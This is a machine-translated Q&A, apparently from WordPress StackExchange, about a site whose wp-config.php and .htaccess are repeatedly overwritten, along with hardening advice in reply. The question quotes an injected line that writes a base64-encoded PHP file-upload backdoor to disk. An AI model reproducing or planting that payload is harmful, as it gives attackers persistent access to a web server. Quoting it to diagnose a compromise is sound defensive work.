我有一个WordPress网站(v5.2.3),并且偶尔(可能每月)有wp-config.php 和.htaccess 文件被错误信息覆盖。
这会导致两个问题-首先是数据库访问详细信息wp-config 更改为不起作用的内容,然后由于信息丢失,访问我的帖子链接永久链接的能力将丢失htaccess.
被覆盖后,我的wp-config 文件中充满了这样的行:
file_put_contents("wp-remote-upload.php", base64_decode(\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\'));
我的
wp-config 文件中有这么多这样的行,大小约为800Kb。
我在WordPress网站上使用的插件如下:
Akismet Anti-Spam[由Automatic提供的第4.0.1版]
联系表单7[由Takayuki Miyoshi提供的第4.9.2版]复制器[由Snap Creek提供的第1.2.3版]Google Analytics for WordPress[由MonsterInsights提供的第7.1版]你好Dolly[由Matt Mullenweg提供的第1.6版]限制登录尝试[由Johan Eenfeldt提供的第1.7.1版]徽标[由Slider提供的第1.4.7版EnigmaWeb]
最近发布小部件扩展【Satrya编写的v0.9.9.7】静噪选项卡和手风琴短代码【Matt Lowe编写的v0.4.1】WordPress导入程序【wordpressdotorg编写的v0.6.3】Yoast SEO【Yoast团队编写的v5.9.1】使用我的FTP程序,我尝试将权限更改为wp-config.php 和.htaccess 文件,使其无法写入-但是,我尝试更改这些值,但没有导致任何更改。我假设我没有能力更改文件权限。如何防止这些文件被过度写入?
或者,我如何发现更改这些文件的原因?
最合适的回答,由SO网友:Mike Baxter 整理而成
如果这种情况经常发生,您的安全插件就会出现故障。
以下是可以采取的几个步骤来防止这种情况:
首先使用一个非常好的安全插件,比如Wordfence Security. 自从我开始使用它以来,我还没有发生过成功的黑客事件如果失败,或者您只需要EXTRA STRONG 锁定,您还可以尝试以下操作。我在我们的intranet站点上做了与Microsoft类似的工作,以避免我的不太了解情况的硬件管理员意外修改/删除文件。这种锁定要求您在每次执行插件或主题安装/更新/删除或任何操作时手动解锁所有内容。(阅读:万不得已)。
使用chmod(或您的文件管理器)从关键文件中删除写入权限,如。htaccess和Wordpress根目录中的大多数PHP文件this answer 防止意外的主机更新和根访问为了进一步阅读(如果你睡眠不好,请避免,这可能会导致噩梦),Kinsta有一篇关于Wordpress漏洞以及如何避免这些漏洞的优秀文章。
